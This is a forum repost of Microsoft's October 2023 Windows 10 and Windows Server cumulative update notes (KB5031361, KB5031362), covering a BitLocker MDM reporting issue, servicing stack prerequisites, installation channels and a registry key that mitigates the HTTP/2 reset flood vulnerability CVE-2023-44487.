    Sets the allowed number of resets (RST_STREAMS) per minute for a connection. When you reach this limit, the connection ends.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the October 2023 Security Updates.
    Windows 10 servicing stack update - 17763.4965
    This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. 
    Known issues in this update
    Symptom
    Workaround
    Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also pe affected.
    Important This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.
     
    To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured.
    We are working on a resolution and will provide an update in an upcoming release.
     
     
    How to get this update
    Before installing this update
    Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    Prerequisite:
    You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. 
     
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Windows 10
    Classification: Security Updates
    If you want to remove the LCU
    To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
    Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5031361.
    For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.4965. 

    SeedTheNet
    October 10, 2023—KB5031362 (OS Build 14393.6351)
    Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
    10/10/2023
    Version:
    OS Build 14393.6351
    11/19/20
    For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of  Windows 10, version 1607, see its update history page.  
    Highlights
    This update supports daylight saving time (DST) changes in Greenland.
    This update addresses security issues for your Windows operating system. 
    Improvements
    This security update includes quality improvements. When you install this KB: 
    New! IE mode and Microsoft Edge can now share cookies. To learn more, see Cookie sharing between Microsoft Edge and Internet Explorer.
    New! This update completes the work to comply with the GB18030-2022 requirements. It removes and remaps characters for Microsoft Wubi input and Microsoft Pinyin U-mode input. You can no longer enter character codepoints that are not supported. All the required codepoints are up to date.
    This update changes the spelling of Ukraine's capital from Kiev to Kyiv.
    This update addresses an issue that affects external binding. It fails. This occurs after you install Windows updates dated May 2023 or later. Because of this, there are issues that affect LDAP queries and authentication.
    To protect against CVE-2023-44487, you should install the latest Windows update. Based on your use case, you can also set the limit of the RST_STREAMS per minute using the new registry key in this update.
    Registry key
    Default value
    Valid value range
    Registry key function
    Http2MaxClientResetsPerMinute
    500
    0–65535
    Sets the allowed number of resets (RST_STREAMS) per minute for a connection. When you reach this limit, the connection ends.
    If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.  
    For more information about security vulnerabilities, please refer to the new Security Update Guide website and the October 2023 Security Updates.
    Known issues in this update
    Microsoft is not currently aware of any issues with this update.
    How to get this update
    Before installing this update
    Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. 
    If you are using Windows Update, the latest SSU (KB5031467) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. 
    Install this update
    Release Channel
    Available
    Next Step
    Windows Update and Microsoft Update
    Yes
    None. This update will be downloaded and installed automatically from Windows Update.
    Windows Update for Business
    Yes
    None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
    Microsoft Update Catalog
    Yes
    To get the standalone package for this update, go to the Microsoft Update Catalog website.
    Windows Server Update Services (WSUS)
    Yes
    This update will automatically sync with WSUS if you configure Products and Classifications as follows:
    Product: Windows 10
    Classification: Security Updates
     
    File information
    For a list of the files that are provided in this update, download the file information for cumulative update 5031362.

  • Member Statistics

    40
    Total Members
    60
    Most Online
    fluoxetine cost
    Newest Member
    fluoxetine cost
    Joined
×
×
  • Create New...

Important Information

Privacy Policy